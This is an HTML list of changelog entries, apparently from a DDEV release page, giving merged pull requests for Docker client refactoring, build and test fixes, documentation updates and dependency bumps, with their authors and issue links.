<li>refactor: replace <code>docker context</code> with <code>docker/cli</code> library, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2140580271" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5862" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5862/hovercard" href="https://github.com/ddev/ddev/issues/5862">#5862</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2539187699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6557" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6557/hovercard" href="https://github.com/ddev/ddev/issues/6557">#6557</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2974049378" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7189" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7189/hovercard" href="https://github.com/ddev/ddev/pull/7189">#7189</a></li>
<li>fix(testddevexportdb): postgres:14 output dump statement was suddenly more than 80 characters from end by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3323762068" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7528/hovercard" href="https://github.com/ddev/ddev/pull/7528">#7528</a></li>
<li>feat: replace <code>docker run</code> in <code>ddev auth ssh</code> with Docker API and accept stdin by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3293531327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7511" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7511/hovercard" href="https://github.com/ddev/ddev/pull/7511">#7511</a></li>
<li>docs: enhance CLAUDE.md development workflow documentation [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3328863173" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7532" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7532/hovercard" href="https://github.com/ddev/ddev/pull/7532">#7532</a></li>
<li>feat(tools): consolidate development tool installations into unified script [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3324089500" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7530/hovercard" href="https://github.com/ddev/ddev/pull/7530">#7530</a></li>
<li>docs(troubleshooting): add more links to mutagen troubleshooting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3323918054" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7529" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7529/hovercard" href="https://github.com/ddev/ddev/pull/7529">#7529</a></li>
<li>fix: make ddev describe work correctly with new Docker Desktop, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3316133537" data-permission-text="Title is private" data-url="https://github.com/docker/for-mac/issues/7742" data-hovercard-type="issue" data-hovercard-url="/docker/for-mac/issues/7742/hovercard" href="https://github.com/docker/for-mac/issues/7742">docker/for-mac#7742</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3325219675" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7531/hovercard" href="https://github.com/ddev/ddev/pull/7531">#7531</a></li>
<li>build: add optional notarization skip via DISABLE_NOTARIZATION variable [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3330930149" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7534" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7534/hovercard" href="https://github.com/ddev/ddev/pull/7534">#7534</a></li>
<li>build(webserver): add <code>*_PROXY</code> and <code>DDEV_*</code> env for sudo; testing docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186033902" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7413" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7413/hovercard" href="https://github.com/ddev/ddev/issues/7413">#7413</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3330967280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7535" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7535/hovercard" href="https://github.com/ddev/ddev/pull/7535">#7535</a></li>
<li>refactor(docker): suppress any output (stdout, stderr) from docker/cli, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2974049378" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7189" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7189/hovercard" href="https://github.com/ddev/ddev/pull/7189">#7189</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3331480451" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7536" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7536/hovercard" href="https://github.com/ddev/ddev/pull/7536">#7536</a></li>
<li>feat: Upsun support for PLATFORM_APP and PLATFORM_PRIMARY_RELATIONSHIP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3212917274" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7437" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7437/hovercard" href="https://github.com/ddev/ddev/pull/7437">#7437</a></li>
<li>feat: add Linux support for heidisql command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175289326" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7399" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7399/hovercard" href="https://github.com/ddev/ddev/pull/7399">#7399</a></li>
<li>fix(backdrop): Fix nginx config for routes conflicting with directories, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3281966625" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7495" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7495/hovercard" href="https://github.com/ddev/ddev/issues/7495">#7495</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3282002130" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7496" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7496/hovercard" href="https://github.com/ddev/ddev/pull/7496">#7496</a></li>
<li>fix(pantheon): update Pantheon database pull to get fresh DB and file push to be CMS-agnostic, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1829595175" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5215" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5215/hovercard" href="https://github.com/ddev/ddev/issues/5215">#5215</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1627492558" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4760" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4760/hovercard" href="https://github.com/ddev/ddev/issues/4760">#4760</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3266115981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7486/hovercard" href="https://github.com/ddev/ddev/pull/7486">#7486</a></li>
<li>docs: fiddle with sponsorship title [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3338944829" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7540" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7540/hovercard" href="https://github.com/ddev/ddev/pull/7540">#7540</a></li>
<li>fix: quote DDEV_PRIMARY_URL expansion in launch script to handle empty values, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3196498757" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7424" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7424/hovercard" href="https://github.com/ddev/ddev/issues/7424">#7424</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3342090694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7548/hovercard" href="https://github.com/ddev/ddev/pull/7548">#7548</a></li>
<li>fix: add mutagen sync flush after XHProf enable to prevent intermittent test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339236069" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7543/hovercard" href="https://github.com/ddev/ddev/pull/7543">#7543</a></li>
<li>chore(deps): bump docker-compose to v2.39.2, remove <code>COMPOSE_BAKE=false</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3340715425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7545" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7545/hovercard" href="https://github.com/ddev/ddev/pull/7545">#7545</a></li>
<li>feat: add ddev version to ddev describe command, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3171781898" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7398" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7398/hovercard" href="https://github.com/ddev/ddev/issues/7398">#7398</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomasnorre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomasnorre">@tomasnorre</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339105714" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7541/hovercard" href="https://github.com/ddev/ddev/pull/7541">#7541</a></li>
<li>docs: add sponsorship banner to documentation, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2782574881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6892" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6892/hovercard" href="https://github.com/ddev/ddev/issues/6892">#6892</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3345259311" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7551/hovercard" href="https://github.com/ddev/ddev/pull/7551">#7551</a></li>
<li>docs: Use docs.ddev.com instead of ddev.readthedocs.io by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346751278" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7552" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7552/hovercard" href="https://github.com/ddev/ddev/pull/7552">#7552</a></li>
<li>feat: support add-ons written primarily in PHP, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3077187507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7316" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7316/hovercard" href="https://github.com/ddev/ddev/issues/7316">#7316</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3316977566" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7523" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7523/hovercard" href="https://github.com/ddev/ddev/pull/7523">#7523</a></li>
<li>docs: Fix blog link in main nav by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mxr576/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mxr576">@mxr576</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355892005" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7566" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7566/hovercard" href="https://github.com/ddev/ddev/pull/7566">#7566</a></li>
<li>test: jq is not available on Windows, use docker run -i ddev/ddev-utilities by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355436775" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7564" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7564/hovercard" href="https://github.com/ddev/ddev/pull/7564">#7564</a></li>
<li>test: Skip TestComposerCreateProjectCmd on Windows where it hangs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355508365" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7565" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7565/hovercard" href="https://github.com/ddev/ddev/pull/7565">#7565</a></li>
<li>fix(magerun): use stable branch for autocompletion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3356302318" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7567" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7567/hovercard" href="https://github.com/ddev/ddev/pull/7567">#7567</a></li>
<li>test(buildkite): do better cleaning up volumes before running test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3356695008" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7568" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7568/hovercard" href="https://github.com/ddev/ddev/pull/7568">#7568</a></li>
<li>test(buildkite): Minor fixup for buildkite timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3361679482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7571" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7571/hovercard" href="https://github.com/ddev/ddev/pull/7571">#7571</a></li>
<li>chore(mkdocs): disable privacy plugin for local builds, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2213591467" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6027" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6027/hovercard" href="https://github.com/ddev/ddev/pull/6027">#6027</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3359866759" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7569" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7569/hovercard" href="https://github.com/ddev/ddev/pull/7569">#7569</a></li>
<li>build(deps): bump 1password/load-secrets-action from 2 to 3 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3354194100" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7561" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7561/hovercard" href="https://github.com/ddev/ddev/pull/7561">#7561</a></li>
<li>build(dbserver): switch to <code>bitnamilegacy/mysql</code> for MySQL 8.0 and 8.4, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3249166670" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7470" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7470/hovercard" href="https://github.com/ddev/ddev/issues/7470">#7470</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360019241" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7570" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7570/hovercard" href="https://github.com/ddev/ddev/pull/7570">#7570</a></li>
<li>build: go back to stable spf/cobra, reverting <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3222958615" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7445" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7445/hovercard" href="https://github.com/ddev/ddev/pull/7445">#7445</a>, bump go-viper/mapstructure, replaces <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3342049037" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7547" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7547/hovercard" href="https://github.com/ddev/ddev/pull/7547">#7547</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3372983733" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7580" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7580/hovercard" href="https://github.com/ddev/ddev/pull/7580">#7580</a></li>
<li>fix: add missing ephemeral port handling to xhgui service, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3351453847" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7557" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7557/hovercard" href="https://github.com/ddev/ddev/issues/7557">#7557</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353596255" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7560" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7560/hovercard" href="https://github.com/ddev/ddev/pull/7560">#7560</a></li>
<li>fix(provider): add warnings for empty pull/push, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368663008" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7576" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7576/hovercard" href="https://github.com/ddev/ddev/issues/7576">#7576</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3372202833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7578" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7578/hovercard" href="https://github.com/ddev/ddev/pull/7578">#7578</a></li>
<li>fix: report MariaDB/MySQL/PostgreSQL client install failures and refactor timeout logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339184632" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7542/hovercard" href="https://github.com/ddev/ddev/pull/7542">#7542</a></li>
<li>docs(provider): soften language about use of provider push by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3373934430" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7581" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7581/hovercard" href="https://github.com/ddev/ddev/pull/7581">#7581</a></li>
<li>fix: cache <code>WarningOnce</code>, reduce <code>NewApp</code> calls, handle <code>GetDockerClient</code> errors, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250075018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7472" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7472/hovercard" href="https://github.com/ddev/ddev/issues/7472">#7472</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364607462" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7574" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7574/hovercard" href="https://github.com/ddev/ddev/pull/7574">#7574</a></li>
<li>fix: set 20m download timeout and retry with doubled timeout on "context deadline exceeded", fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3066708425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7298" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7298/hovercard" href="https://github.com/ddev/ddev/issues/7298">#7298</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368090739" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7575" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7575/hovercard" href="https://github.com/ddev/ddev/pull/7575">#7575</a></li>
<li>build: gitignore/CLAUDE.md nitpicks [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3384402242" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7588" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7588/hovercard" href="https://github.com/ddev/ddev/pull/7588">#7588</a></li>
<li>refactor: add dockerManager singleton, split dockerutils.go, add IsWindows/IsMacOS/IsLinux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3381116582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7587" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7587/hovercard" href="https://github.com/ddev/ddev/pull/7587">#7587</a></li>
<li>test(buildkite): buildkite can take a few minutes to pull new images [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3390957971" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7596" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7596/hovercard" href="https://github.com/ddev/ddev/pull/7596">#7596</a></li>
<li>build(deps): bump actions/setup-go from 5 to 6 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615826" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7602" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7602/hovercard" href="https://github.com/ddev/ddev/pull/7602">#7602</a></li>
<li>build(deps): bump actions/setup-python from 5.6.0 to 6.0.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7601" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7601/hovercard" href="https://github.com/ddev/ddev/pull/7601">#7601</a></li>
